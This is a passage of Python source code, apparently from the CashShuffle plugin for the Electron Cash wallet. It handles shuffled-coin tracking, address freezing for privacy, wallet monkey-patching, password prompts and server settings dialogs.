window.utxo_list.in_progress.pop(coin_name, None)
else:
window.utxo_list.in_progress[coin_name] = new_in_progress
window.utxo_list.update()
def _got_tx_check_tentative_shuffles(window, tx):
''' GUI thread: Got a new transaction for a window, so see if we should
apply the shuffle_tentative label to it. The below mechanism is a
workaround for bug #70. '''
t = getattr(window, '_shuffle_tentative', None)
if not t:
# Most of the time this code path is taken as the dict is usually empty.
# It only ever has entries when a shuffle failed at phase 4.
return
inputs, outputs = tx.inputs(), tx.outputs()
for utxo, info in t.copy().items():
# loop through all of the "tentative tx's" we have. this dict should be very small,
# it only contains entries for shuffles that timed out in phase 4 where last player took too long (bug #70)
addr, tot, amt, chg, fee, scale = info
for txin in inputs:
if CoinUtils.get_name(txin) == utxo:
# found the coin in the incoming tx. Now make sure it's our anticipated shuffle tx that failed and not some other tx, so we apply the correct label only when it's the phase-4-failed shuffle tx.
for n, txout in enumerate(outputs):
# Search the outputs of this tx to make sure they match what we expected for scale, out_addr...
typ, _addr, amount = txout
# the below checks make sure it matches what we expected from the failed shuffle, and also that the coin is shuffled (paranoia check).
if isinstance(_addr, Address) and amount == amt and _addr.to_storage_string() == addr:
txid = tx.txid()
if CoinUtils.is_coin_shuffled(window.wallet, {'prevout_hash':txid, 'prevout_n':n, 'address':_addr, 'value':amount}, {txid: tx}):
# all checks pass -- we successfully recovered from bug #70! Hurray!
window.wallet.set_label(txid, _make_label(window, tot, amt, chg, fee, scale))
Plugin._increment_shuffle_counter(window)
window.print_error("CashShuffle: found coin {} in tentative shuffle cache, applied label".format(utxo))
window.update_wallet()
else:
# hmm. this branch is very very unlikely.
window.print_error("CashShuffle: found coin {} in shuffle cache, but its tx is not a shuffle tx; label not applied".format(utxo))
break
else:
# This coin was spent in this tx, but it appears to not be the tx we anticipated.. Last player didn't broadcast and we spent it later (perhaps as a re-shuffle or other).
window.print_error("CashShuffle: removing spent coin {} from tentative shuffle cache, label not applied".format(utxo))
t.pop(utxo) # unconditionally remove this tentative coin from the dict since either way it's spent
return
def _got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc(window, tx):
''' Freeze address after spending from a shuffled coin address for privacy (issue #100).
Also remove any shuffled coin spends from the _is_shuffled_cache. '''
inputs = tx.inputs()
addrs_to_freeze = set()
coins_to_purge_from_shuffle_cache = list()
coins_to_purge_from_reshuffles = set()
wallet = window.wallet
all_addresses = None
def is_mine(a):
''' This is faster than calling wallet.is_mine on *each* input
as that involves a lot of rebuilding of the addresses list for each call.
Also we use a set here which is faster than O(n) list lookup.
This matters on huge tx's with many inputs as a speedup.'''
nonlocal all_addresses
if all_addresses is None:
all_addresses = set(wallet.get_addresses())
return a in all_addresses
for inp in inputs:
addr = inp['address']
if isinstance(addr, Address) and is_mine(addr):
# This coin was ours, purge True/False results from the
# _is_shuffled_cache for this coin.
name = CoinUtils.get_name(inp)
coins_to_purge_from_shuffle_cache.append(name)
coins_to_purge_from_reshuffles.add(name)
if addr not in addrs_to_freeze and wallet.is_coin_shuffled(inp):
# We spent a shuffled coin belonging to us.
# Freeze that address to protect privacy.
addrs_to_freeze.add(addr)
if addrs_to_freeze:
change_addr_set = set(wallet.get_change_addresses())
addrs_to_freeze2 = addrs_to_freeze & change_addr_set # we *ONLY* freeze if change address. see #1291
if addrs_to_freeze2:
wallet.set_frozen_state(addrs_to_freeze2, True)
for addr in addrs_to_freeze2:
name = addr.to_storage_string()
if not wallet.labels.get(name): # only put a label in there if no label there already
wallet.set_label(name, _("Shuffled coin spent (frozen for privacy)"))
# the below is to prevent the "is_shuffled_cache" from growing forever which
# impacts performance and wastes memory. Since we were checking a seen TX
# anyway, might as well expire coins from the cache that were spent.
# remove_from_shufflecache acquires locks as it operates on the cache.
CoinUtils.remove_from_shufflecache(wallet, coins_to_purge_from_shuffle_cache)
# "forget" that these addresses were designated as shuffled addresses.
CoinUtils.remove_from_shuffled_address_cache(wallet, addrs_to_freeze)
wallet._reshuffles.difference_update(coins_to_purge_from_reshuffles)
def _got_tx(window, tx):
''' Generic callback to monitor tx's received for a wallet. Note that
if this is called the tx definitely is for this window/wallet. '''
if not hasattr(window, '_shuffle_patched_'):
# defensie programming in case this signal arrives late
# just as the user was disabling cash shuffle
# (signal arrives via QueuedConnection which is why this check is necessary)
return
_got_tx_check_tentative_shuffles(window, tx) # check for workaround to bug#70
_got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc(window, tx) # Feature #100
# Note at this point the is_shuffled cache has had entries for inputs in
# the tx above removed. If you want to add checks to this function that
# involve the _is_shuffled_cache, do it above before the
# '_got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc' call.
class MsgForwarder(QObject):
''' Forwards messages from BackgroundShufflingThread to the GUI thread using
Qt signal magic. See function update_coin_status above. '''
gotMessage = pyqtSignal(str, str)
def __init__(self, window):
super().__init__(None)
self.window = window
self.gotMessage.connect(self.gotMsgSlot)
def send(self, msg, sender):
self.gotMessage.emit(msg, sender)
def gotMsgSlot(self, msg, sender):
update_coin_status(self.window, sender, msg)
def disconnectAll(self):
try:
self.gotMessage.disconnect()
except:
pass
def start_background_shuffling(window, network_settings, period = 10.0, password = None, timeout = 60.0):
logger = MsgForwarder(window)
window.background_process = BackgroundShufflingThread(window,
window.wallet,
network_settings,
logger = logger,
period = period,
password = password,
timeout = timeout)
window.background_process.start()
def monkey_patches_apply(window):
def patch_window(window):
if getattr(window, '_shuffle_patched_', None):
return
window.background_process = None
window.send_tab_shuffle_extra = SendTabExtra(window)
window._shuffle_tentative = dict()
class Sigs(QObject):
tx = pyqtSignal(QObject, object)
window._shuffle_sigs = sigs = Sigs(window)
sigs.tx.connect(_got_tx)
window._shuffle_network_callback = lambda event, *args: network_callback(window, event, *args)
if window.network:
window.network.register_callback(window._shuffle_network_callback, ['new_transaction'])
window._shuffle_patched_ = True
window.force_use_single_change_addr = _("CashShuffle is enabled: change address logic will be handled by CashShuffle (to preserve privacy).")
print_error("[shuffle] Patched window")
def patch_utxo_list(utxo_list):
if getattr(utxo_list, '_shuffle_patched_', None):
return
header = utxo_list.headerItem()
header_labels = [header.text(i) for i in range(header.columnCount())]
header_labels.append(_("Shuffle status"))
utxo_list.update_headers(header_labels)
utxo_list.in_progress = dict()
utxo_list._shuffle_patched_ = True
print_error("[shuffle] Patched utxo_list")
def patch_wallet(wallet):
if getattr(wallet, '_shuffle_patched_', None):
return
wallet.is_coin_shuffled = lambda coin, txs=None: CoinUtils.is_coin_shuffled(wallet, coin, txs)
wallet.get_shuffled_and_unshuffled_coins = lambda *args, **kwargs: CoinUtils.get_shuffled_and_unshuffled_coins(wallet, *args, **kwargs)
wallet.cashshuffle_get_new_change_address = lambda for_shufflethread=False: CoinUtils.get_new_change_address_safe(wallet, for_shufflethread=for_shufflethread)
wallet._is_shuffled_cache = dict()
wallet._shuffled_address_cache = set()
wallet._addresses_cashshuffle_reserved = set()
wallet._reshuffles = set()
wallet._last_change = None
CoinUtils.load_shuffle_change_shared_with_others(wallet) # sets wallet._shuffle_change_shared_with_others
# Paranoia -- force wallet into this single change address mode in case
# other code (plugins, etc) generate tx's. We don't want tx generation
# code to clobber our shuffle tx output addresses.
change_addr_policy_1 = (bool(wallet.storage.get('use_change')), bool(wallet.storage.get('multiple_change')))
change_addr_policy_2 = (bool(wallet.use_change), bool(wallet.multiple_change))
desired_policy = (True, False)
if any(policy != desired_policy for policy in (change_addr_policy_1, change_addr_policy_2)):
wallet.use_change, wallet.multiple_change = desired_policy
wallet.storage.put('use_change', desired_policy[0])
wallet.storage.put('multiple_change', desired_policy[1])
wallet.print_error("CashShuffle forced change address policy to: use_change={}, multiple_change={}"
.format(desired_policy[0], desired_policy[1]))
# More paranoia -- in case app crashed, unfreeze coins frozen by last
# app run.
CoinUtils.unfreeze_frozen_by_shuffling(wallet)
wallet._shuffle_patched_ = True
print_error("[shuffle] Patched wallet")
patch_wallet(window.wallet)
patch_utxo_list(window.utxo_list)
patch_window(window)
def monkey_patches_remove(window):
def restore_window(window):
if not getattr(window, '_shuffle_patched_', None):
return
if window.network:
window.network.unregister_callback(window._shuffle_network_callback)
delattr(window, '_shuffle_network_callback')
try: window._shuffle_sigs.tx.disconnect()
except TypeError: pass
window._shuffle_sigs.deleteLater()
delattr(window, "_shuffle_sigs")
delattr(window, '_shuffle_tentative')
window.send_tab_shuffle_extra.setParent(None); window.send_tab_shuffle_extra.deleteLater();
delattr(window, 'send_tab_shuffle_extra')
delattr(window, 'background_process')
delattr(window, '_shuffle_patched_')
window.force_use_single_change_addr = None
print_error("[shuffle] Unpatched window")
# Note that at this point an additional monkey patch: 'window.__disabled_sendtab_extra__' may stick around until the plugin is unloaded altogether
def restore_utxo_list(utxo_list):
if not getattr(utxo_list, '_shuffle_patched_', None):
return
header = utxo_list.headerItem()
header_labels = [header.text(i) for i in range(header.columnCount())]
del header_labels[-1]
utxo_list.update_headers(header_labels)
utxo_list.in_progress = None
delattr(window.utxo_list, "in_progress")
delattr(window.utxo_list, '_shuffle_patched_')
print_error("[shuffle] Unpatched utxo_list")
def restore_wallet(wallet):
if not getattr(wallet, '_shuffle_patched_', None):
return
delattr(wallet, '_addresses_cashshuffle_reserved')
delattr(wallet, 'cashshuffle_get_new_change_address')
delattr(wallet, "is_coin_shuffled")
delattr(wallet, "get_shuffled_and_unshuffled_coins")
delattr(wallet, "_is_shuffled_cache")
delattr(wallet, "_shuffled_address_cache")
delattr(wallet, '_shuffle_patched_')
delattr(wallet, "_last_change")
delattr(wallet, "_reshuffles")
CoinUtils.store_shuffle_change_shared_with_others(wallet) # save _shuffle_change_shared_with_others to storage -- note this doesn't call storage.write() for performance reasons.
delattr(wallet, '_shuffle_change_shared_with_others')
CoinUtils.unfreeze_frozen_by_shuffling(wallet)
print_error("[shuffle] Unpatched wallet")
restore_window(window)
restore_utxo_list(window.utxo_list)
restore_wallet(window.wallet)
def _elide(x, maxlen=30, startlen=8):
''' Useful for eliding GUI text with an ellipsis ... in the middle '''
if len(x) > maxlen and startlen + 3 < maxlen:
return x[:startlen] + "..." + x[-(maxlen-startlen-3):]
return x
class Plugin(BasePlugin):
instance = None # The extant instance singleton, if any. Variable is cleared on plugin stop.
gui = None # The "gui object" singleton (ElectrumGui) -- a useful refrence to keep around.
network_dialog = None # The NetworkDialog window singleton (managed by the ElectrumGui singleton).
def fullname(self):
return 'CashShuffle'
def description(self):
return _("CashShuffle Protocol")
def is_available(self):
return True
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.windows = []
self.disabled_windows = [] # this is to manage the "cashshuffle disabled" xtra gui element in the send tab
self._hide_history_txs = False
self.initted = False
def is_defunct(self):
return Plugin.instance is not self
@hook
def init_qt(self, gui):
if self.initted:
return
self.print_error("Initializing...")
Plugin.instance = self
Plugin.gui = gui
self._delete_old_keys(gui.config)
if Plugin.network_dialog != gui.nd:
Plugin.network_dialog = gui.nd # each time we are stopped, our module gets re-imported and we lose globals... so try and recapture this singleton
ct = 0
for window in gui.windows:
self.on_new_window(window)
ct += 1
self.on_network_dialog(Plugin.network_dialog) # If we have a network dialgog, add self to network dialog
self.initted = True
self._hide_history_txs = bool(gui.config.get(ConfKeys.Global.HIDE_TXS_FROM_HISTORY, False))
self.print_error("Initialized (had {} extant windows).".format(ct))
self._hide_history_txs_check()
@hook
def on_network_dialog(self, nd):
Plugin.network_dialog = nd
if not nd: return
self.print_error("OnNetworkDialog", str(nd))
if not hasattr(nd, "__shuffle_settings__") or not nd.__shuffle_settings__:
nd.__shuffle_settings__ = st = SettingsTab(parent=nd.nlayout.tabs, config=nd.nlayout.config)
nd.nlayout.tabs.addTab(st, QIcon(':icons/CashShuffleLogos/logo-vertical.svg'), _("CashShuffle"))
st.applyChanges.connect(Plugin.try_to_apply_network_dialog_settings)
elif nd.__shuffle_settings__:
# they may have a fake view if they didn't apply the last settings, refresh the view
st = nd.__shuffle_settings__
st.refreshFromSettings()
@hook
def window_update_status(self, window):
but = getattr(window, '__shuffle__status__button__', None)
if but:
but.update_cashshuffle_icon()
def show_cashshuffle_tab_in_network_dialog(self, window):
window.gui_object.show_network_dialog(window)
nd = Plugin.network_dialog
if nd and getattr(nd, '__shuffle_settings__', None):
st = nd.__shuffle_settings__
nd.nlayout.tabs.setCurrentWidget(st)
nd.activateWindow()
return True
return False
def del_network_dialog_tab(self):
# delete the shuffle settings widget
if Plugin.network_dialog and hasattr(Plugin.network_dialog, '__shuffle_settings__'):
nd = Plugin.network_dialog
st = Plugin.network_dialog.__shuffle_settings__
if st:
idx = nd.nlayout.tabs.indexOf(st)
if idx > -1:
if nd.nlayout.tabs.currentIndex() == idx:
nd.nlayout.tabs.setCurrentIndex(0)
nd.nlayout.tabs.removeTab(idx)
st.kill()
st.setParent(None)
st.deleteLater() # need to call this otherwise it sticks around :/
st = None
Plugin.network_dialog.__shuffle_settings__ = None
self.print_error("Removed CashShuffle network settings tab")
def window_has_cashshuffle(self, window):
return window in self.windows
def window_wants_cashshuffle(self, window):
return window.wallet.storage.get(ConfKeys.PerWallet.ENABLED, False)
def window_set_wants_cashshuffle(self, window, b):
window.wallet.storage.put(ConfKeys.PerWallet.ENABLED, bool(b))
def window_set_cashshuffle(self, window, b):
if not b and self.window_has_cashshuffle(window):
self._disable_for_window(window)
elif b and not self.window_has_cashshuffle(window):
self._enable_for_window(window)
self.window_set_wants_cashshuffle(window, b)
def _window_set_disabled_extra(self, window):
self._window_clear_disabled_extra(window)
window.__disabled_sendtab_extra__ = SendTabExtraDisabled(window)
def _window_clear_disabled_extra(self, window):
extra = getattr(window, "__disabled_sendtab_extra__", None)
if extra:
extra.setParent(None) # python will gc this badboy
delattr(window, "__disabled_sendtab_extra__")
del extra # hopefully object refct goes immediately to 0 and this widget dies quickly.
return True
@classmethod
def is_wallet_cashshuffle_compatible(cls, window):
from electroncash.wallet import ImportedWalletBase, Multisig_Wallet
if (window.wallet.is_watching_only()
or window.wallet.is_hardware()
or isinstance(window.wallet, (Multisig_Wallet, ImportedWalletBase))):
# wallet is watching-only, multisig, or hardware so.. not compatible
return False
return True
def add_button_to_window(self, window):
if not hasattr(window, '__shuffle__status__button__'):
from .qt_status_bar_mgr import ShuffleStatusBarButtonMgr
window.__shuffle__status__button__ = ShuffleStatusBarButtonMgr(self, window)
window.print_error("Added cashshuffle status button")
@classmethod
def remove_button_from_window(cls, window):
if hasattr(window, '__shuffle__status__button__'):
window.__shuffle__status__button__.remove()
delattr(window, '__shuffle__status__button__')
window.print_error("Removed cashshuffle status button")
@hook
def on_new_window(self, window):
if not self.is_wallet_cashshuffle_compatible(window):
# wallet is watching-only, multisig, or hardware so.. mark it permanently for no cashshuffle
self.window_set_cashshuffle(window, False)
window.update_status() # this has the side-effect of refreshing the cash shuffle status bar button's context menu (which has actions even for disabled/incompatible windows)
return
self.add_button_to_window(window) # unconditionally add the button if compatible -- they may want to enable it later
if window.wallet and not self.window_has_cashshuffle(window):
if self.window_wants_cashshuffle(window):
self._enable_for_window(window) or self._window_add_to_disabled(window)
else:
self._window_add_to_disabled(window)
def _enable_for_window(self, window):
name = window.wallet.basename()
self.print_error("Window '{}' registered, performing window-specific startup code".format(name))
if window.gui_object.warn_if_no_secp(
parent=window,
message=_("CashShuffle requires libsecp; cannot enable shuffling for this wallet."),
icon=QMessageBox.Critical):
self.print_error("Refusing to enable CashShuffle for window '{}' because no libsecp :(".format(name))
return
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
cached_password = window.gui_object.get_cached_password(window.wallet)
password = None
while window.wallet.has_password():
msg = _("CashShuffle requires access to '{}'.").format(name) + "\n" + _('Please enter your password')
if cached_password:
password = cached_password
cached_password = None
else:
pwdlg = PasswordDialog(parent=window.top_level_window(), msg=msg)
password = pwdlg.run()
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
if password is None:
# User cancelled password input
if not self.warn_if_shuffle_disable_not_ok(window, msg=_('CashShuffle will now be <i>disabled</i> for a wallet which has previously had it <b>enabled</b>. Are you sure?')):
# User was warned and opted to try again to enable
continue
self.window_set_cashshuffle(window, False)
window.show_error(_("CashShuffle password prompt canceled; disabling for this wallet."), parent=window)
return
try:
window.wallet.check_password(password)
break
except Exception as e:
window.show_error(str(e), parent=window)
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
continue
network_settings = Plugin.get_network_settings(window.config)
if not network_settings:
network_settings = self.settings_dialog(window, msg=_("Please choose a CashShuffle server"), restart_ask = False)
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
if not network_settings:
self.window_set_cashshuffle(window, False)
window.show_error(_("Can't get network, disabling CashShuffle."), parent=window)
return
self._delete_old_keys(window.wallet)
self._window_remove_from_disabled(window)
network_settings = copy.deepcopy(network_settings)
network_settings['host'] = network_settings.pop('server')
monkey_patches_apply(window)
self.windows.append(window)
self._increment_session_counter(window)
window.update_status()
window.utxo_list.update()
start_background_shuffling(window, network_settings, password=password)
return True
@hook
def utxo_list_item_setup(self, utxo_list, item, x, name):
my_custom_item_setup(utxo_list, item, x, name)
@hook
def utxo_list_context_menu_setup(self, utxo_list, menu, selected):
window = utxo_list.parent
if window in self.windows:
my_custom_utxo_context_menu_setup(window, utxo_list, menu, selected)
@hook
def history_list_filter(self, history_list, h_item, label):
# NB: 'h_item' might be None due to performance reasons
if self._hide_history_txs:
return bool(label.startswith("Shuffle ") # this string is not translated for performance reasons. _make_label also does not translate this string.
and ( any( x for x in BackgroundShufflingThread.SCALE_ARROWS
if x in label )
or BackgroundShufflingThread.SCALE_ARROW_UNKNOWN in label
)
)
return None
@hook
def history_list_context_menu_setup(self, history_list, menu, item, tx_hash):
# NB: We unconditionally create this menu if the plugin is loaded because
# it's possible for any wallet, even a watching-only wallet to have
# shuffle tx's with the correct labels (if the user uses labelsync or
# has imported labels).
menu.addSeparator()
def action_callback():
self._hide_history_txs = not self._hide_history_txs
Plugin.gui.config.set_key(ConfKeys.Global.HIDE_TXS_FROM_HISTORY, self._hide_history_txs, save=True)
action.setChecked(self._hide_history_txs)
if self._hide_history_txs:
tip = _("Shuffle transactions are now hidden")
else:
tip = _("Shuffle transactions are now shown")
QToolTip.showText(QCursor.pos(), tip, history_list)
history_list.update() # unconditionally update this history list as it may be embedded in the address_detail window and not a global history list..
for w in Plugin.gui.windows:
# Need to update all the other open windows.
# Note: We still miss any other open windows' address-detail
# history lists with this.. but that's ok as most of the
# time it won't be noticed by people and actually
# finding all those windows would just make this code
# less maintainable.
if history_list is not w.history_list: # check if not already updated above
w.history_list.update()
action = menu.addAction(_("Hide shuffle transactions"), action_callback)
action.setCheckable(True)
action.setChecked(self._hide_history_txs)
def on_close(self):
''' This is called on plugin unload/disable '''
self.del_network_dialog_tab()
PoolsWinMgr.killInstance()
for window in self.windows.copy():
self.on_close_window(window)
for window in self.disabled_windows.copy():
self.on_close_window(window)
for window in self.gui.windows:
# lastly, we do this for ALL the extant wallet windows because all
# of their CashShuffle context menus attached to the cashshuffle
# status button need updating when the plugin is exited. Note
# that there may be windows in this set (incompatible windows)
# that aren't in either of the above 2 sets of windows.
window.update_status()
self.initted = False
Plugin.instance = None
self.print_error("Plugin closed")
assert len(self.windows) == 0 and len(self.disabled_windows) == 0, (self.windows, self.disabled_windows)
self._hide_history_txs_check()
def _hide_history_txs_check(self):
# Handle possibility that now that plugin is closed or opened, shuffle tx's are hidden or not hidden. hide/unhide them
if self._hide_history_txs and Plugin.gui:
def refresh_history_lists(gui):
for w in gui.windows:
w.history_list.update()
QTimer.singleShot(250, lambda: refresh_history_lists(Plugin.gui))
@hook
def on_close_window(self, window):
def didRemove(window):
self.print_error("Window '{}' removed".format(window.wallet.basename()))
self.remove_button_from_window(window)
if self._window_remove_from_disabled(window):
didRemove(window)
return
if self._disable_for_window(window, add_to_disabled = False):
didRemove(window)
return
def _disable_for_window(self, window, add_to_disabled = True):
if window not in self.windows:
return
name = window.wallet.basename()
if window.background_process:
self.print_error("Joining background_process...")
window.background_process.join()
window.background_process.logger.disconnectAll(); window.background_process.logger.deleteLater()
window.background_process = None
self.print_error("Window '{}' closed, ended shuffling for its wallet".format(name))
self.windows.remove(window)
monkey_patches_remove(window)
window.utxo_list.update()
window.update_status()
self.print_error("Window '{}' disabled".format(name))
if add_to_disabled:
self._window_add_to_disabled(window)
else:
self._window_remove_from_disabled(window)
return True
def _window_add_to_disabled(self, window):
if window not in self.disabled_windows:
self._window_set_disabled_extra(window)
self.disabled_windows.append(window)
window.update_status() # ensure cashshuffle icon has the right menus, etc
return True
def _window_remove_from_disabled(self, window):
self._window_clear_disabled_extra(window)
if window in self.disabled_windows:
self.disabled_windows.remove(window)
return True
@hook
def on_new_password(self, window, old, new):
if getattr(window, 'background_process', None):
self.print_error("Got new password for wallet {} informing background process...".format(window.wallet.basename() if window.wallet else 'UNKNOWN'))
window.background_process.set_password(new)
@hook
def on_spend_coins(self, window, coins):
if (not coins or window not in self.windows
# the coin may not be "mine" if doing private key -> sweep
# in that case, just abort this as it doesn't matter what
# mode the send tab is in
or (window.tx_external_keypairs
and not window.wallet.is_mine(coins[0]['address']))):
return
extra = window.send_tab_shuffle_extra
spend_mode = extra.spendingMode()
is_shuffled = CoinUtils.is_coin_shuffled(window.wallet, coins[0]) # check coins[0]
if spend_mode == extra.SpendingModeShuffled and not is_shuffled:
# Coin is not shuffled, spend mode is Shuffled, force send tab to
# coin's mode
extra.setSpendingMode(extra.SpendingModeUnshuffled)
elif spend_mode == extra.SpendingModeUnshuffled and is_shuffled:
# Coin is shuffled, spend mode is UnShuffled, force send tab to
# coin's mode
extra.setSpendingMode(extra.SpendingModeShuffled)
@hook
def spendable_coin_filter(self, window, coins):
if not coins or window not in self.windows:
return
extra = window.send_tab_shuffle_extra
spend_mode = extra.spendingMode()
external_coin_addresses = set() # this is only ever used if they are doing a sweep. in which case we always allow the coins involved in the sweep
for pubkey in window.tx_external_keypairs:
a = Address.from_pubkey(pubkey)
external_coin_addresses.add(a)
if spend_mode == extra.SpendingModeShuffled:
# in Cash-Shuffle mode + shuffled spending we can ONLY spend shuffled coins + unshuffled living on a shuffled coin address
shuf_adrs_seen = set()
shuf_coins_seen = set()
for coin in coins.copy():
if coin['address'] in external_coin_addresses:
# completely bypass this filter for external keypair dict
# which is only used for sweep dialog in send tab
continue
is_shuf_adr = CoinUtils.is_shuffled_address(window.wallet, coin['address'])
if is_shuf_adr:
shuf_adrs_seen.add(coin['address'])
if (not CoinUtils.is_coin_shuffled(window.wallet, coin)
and not is_shuf_adr): # we allow coins sitting on a shuffled address to be "spent as shuffled"
coins.remove(coin)
else:
shuf_coins_seen.add(CoinUtils.get_name(coin))
# NEW! Force co-spending of other coins sitting on a shuffled address (Fix #3)
for adr in shuf_adrs_seen:
adr_coins = window.wallet.get_addr_utxo(adr)
for name, adr_coin in adr_coins.items():
if name not in shuf_coins_seen and not adr_coin['is_frozen_coin']:
coins.append(adr_coin)
shuf_coins_seen.add(name)
elif spend_mode == extra.SpendingModeUnshuffled:
# in Cash-Shuffle mode + unshuffled spending we can ONLY spend unshuffled coins (not sitting on a shuffled address)
for coin in coins.copy():
if ((CoinUtils.is_coin_shuffled(window.wallet, coin)
or is_coin_busy_shuffling(window, coin)
or CoinUtils.is_shuffled_address(window.wallet, coin['address']))
and coin['address'] not in external_coin_addresses):
coins.remove(coin)
@hook
def balance_label_extra(self, window):
if window not in self.windows:
return
shuf, unshuf, uprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(window.wallet)
totShuf, nShuf = shuf
# TODO: handle usas separately?
totShuf += usas[0]
nShuf += usas[1]
window.send_tab_shuffle_extra.refresh(shuf, unshuf, uprog, usas)
if nShuf:
return (_('Shuffled: {} {} in {} Coin'),
_('Shuffled: {} {} in {} Coins'))[0 if nShuf == 1 else 1].format(window.format_amount(totShuf).strip(), window.base_unit(), nShuf)
return None
@hook
def not_enough_funds_extra(self, window):
if window not in self.windows:
return
shuf, unshuf, uprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(window.wallet)
totShuf, nShuf, totUnshuf, nUnshuf, totInProg, nInProg = *shuf, *unshuf, *uprog
# TODO: handle usas separately?
totShuf += usas[0]
nShuf += usas[1]
extra = window.send_tab_shuffle_extra
extra.refresh(shuf, unshuf, uprog)
spend_mode = extra.spendingMode()
rets = []
if spend_mode == extra.SpendingModeShuffled:
if totUnshuf:
rets += [_("{} {} are unshuffled").format(window.format_amount(totUnshuf).strip(), window.base_unit())]
elif spend_mode == extra.SpendingModeUnshuffled:
if totShuf:
rets += [_("{} {} are shuffled").format(window.format_amount(totShuf).strip(), window.base_unit())]
if totInProg:
rets += [_("{} {} are busy shuffling").format(window.format_amount(totInProg).strip(), window.base_unit())]
return ') ('.join(rets) or None
@hook
def get_change_addrs(self, wallet):
for window in self.windows:
if wallet == window.wallet:
change_addrs = [wallet.cashshuffle_get_new_change_address()]
wallet.print_error("CashShuffle: reserving change address",change_addrs[0].to_ui_string())
return change_addrs
@hook
def do_clear(self, w):
for window in self.windows:
if w is window:
extra = getattr(w, 'send_tab_shuffle_extra', None)
if extra:
extra.do_clear()
return
def restart_all(self):
for window in self.windows:
bp = window.background_process
if bp:
password = bp.get_password()
network_settings = Plugin.get_network_settings(window.config)
if network_settings:
bp.join()
# kill the extant console logger as its existence can cause subtle bugs
bp.logger.disconnectAll(); bp.logger.deleteLater(); bp.logger = None
network_settings['host'] = network_settings.pop('server')
window.background_process = None; del bp
start_background_shuffling(window, network_settings, password=password)
window.print_error("CashShuffle restarted for wallet")
nd = Plugin.network_dialog
# force network settings tab to also refresh itself on restart to keep it in synch with other possible settings dialogs
if nd:
st = getattr(nd, "__shuffle_settings__", None)
if st: st.refreshFromSettings()
else:
window.print_error("ERROR: could not load network settings, FIXME!")
else:
window.print_error("WARNING: Window lacks a background_process, FIXME!")
def view_pools(self, window):
assert isinstance(window, ElectrumWindow), "view_pools must be passed an ElectrumWindow object! FIXME!"
settings = __class__.get_and_validate_network_settings(window.config)
if settings:
sdict = settings.copy()
sdict['name'] = "{}:{}".format(sdict['server'], sdict['info'])
PoolsWinMgr.show(sdict, settings, window.config, parent_window=window, modal=False)
else:
# this should not normally be reachable in the UI, hence why we don't i18n the error string.
window.show_error("CashShuffle is not properly set up -- no server defined! Please select a server from the settings.")
def restart_cashshuffle(self, window, msg = None, parent = None):
if (parent or window).question("{}{}".format(msg + "\n\n" if msg else "", _("Restart the CashShuffle plugin now?")),
app_modal=True):
self.restart_all()
window.notify(_("CashShuffle restarted"))
def settings_dialog(self, window, msg=None, restart_ask = True):
def window_parent(w):
# this is needed because WindowModalDialog overrides window.parent
if callable(w.parent): return w.parent()
return w.parent
while not isinstance(window, ElectrumWindow) and window and window_parent(window):
# MacOS fixups -- we can get into a situation where we are created without the ElectrumWindow being an immediate parent or grandparent
window = window_parent(window)
assert window and isinstance(window, ElectrumWindow)
d = SettingsDialog(title=_("CashShuffle Settings"), config=window.config, message=msg)
try:
server_ok = False
ns = None
while not server_ok:
if not d.exec_():
return
else:
ns = d.get_form()
server_ok = d.serverOk
if not server_ok:
server_ok = Plugin.show_bad_server_box()
if ns:
Plugin.save_network_settings(window.config, ns)
if restart_ask:
self.restart_cashshuffle(window, msg = _("CashShuffle must be restarted for the server change to take effect."))
return ns
finally:
d.deleteLater()
del d
@staticmethod
def show_bad_server_box():
return bool(QMessageBox.critical(None, _("Error"), _("Unable to connect to the specified server."), QMessageBox.Retry|QMessageBox.Ignore, QMessageBox.Retry) == QMessageBox.Ignore)
@staticmethod
def try_to_apply_network_dialog_settings(settings_tab):
ns = settings_tab.get_form()
if ns and (settings_tab.serverOk or Plugin.show_bad_server_box()):
Plugin.save_network_settings(settings_tab.config, ns) # save settings first.
gui = Plugin.gui
instance = Plugin.instance
window = None
# Next, try and get a wallet window to query user for plugin restart. If no window found, that's ok. Restart won't be necessary. :)
if instance and instance.windows:
# first try and get a window that actually has cashshuffle running, as that's only polite
window = instance.windows[-1]
elif instance and instance.disabled_windows:
# ok, no enabled windows -- next, get a window that is cashshuffle compatible, if any exist
window = instance.disabled_windows[-1]
elif gui and gui.windows:
# If that fails, get any old window...
window = gui.windows[-1]
# NB: if no window at this point, settings will take effect next time CashShuffle is enabled for a window
if window and instance:
# window will raise itself.
instance.restart_cashshuffle(window,
msg = _("CashShuffle must be restarted for the server change to take effect."),
parent = Plugin.network_dialog)
@staticmethod
def save_network_settings(config, network_settings):
ns = copy.deepcopy(network_settings)
print_error("Saving network settings: {}".format(ns))
config.set_key(ConfKeys.Global.SERVER, ns)
@staticmethod
def get_network_settings(config):
return copy.deepcopy(config.get(ConfKeys.Global.SERVER, None))
@staticmethod
def get_and_validate_network_settings(config):
selected = dict()
try:
# try and pre-populate from config
current = __class__.get_network_settings(config)
dummy = (current["server"], current["info"], current["ssl"]); del dummy;
selected = current
except (KeyError, TypeError):
pass
return selected
def settings_widget(self, window):
weakMeth = Weak(self.settings_dialog)
weakWindow = Weak(window)
return EnterButton(_('Settings'), lambda: weakMeth(weakWindow))
def requires_settings(self):
return True
def _delete_old_keys(self, config_or_wallet):
getter, setter, defuncts, thing = None, None, tuple(), None
if isinstance(config_or_wallet, SimpleConfig):
config = config_or_wallet
getter = lambda k: config.get(k)
setter = lambda k: config.set_key(k, None, save=True)
defuncts = ConfKeys.Global.DEFUNCT
thing = "config"
elif isinstance(config_or_wallet, Abstract_Wallet):
storage = config_or_wallet.storage
getter = lambda k: storage.get(k)
setter = lambda k: storage.put(k, None)
defuncts = ConfKeys.PerWallet.DEFUNCT
thing = "wallet.storage for {}".format(config_or_wallet.basename())
if thing:
ct = 0
for k in defuncts:
if getter(k) is not None:
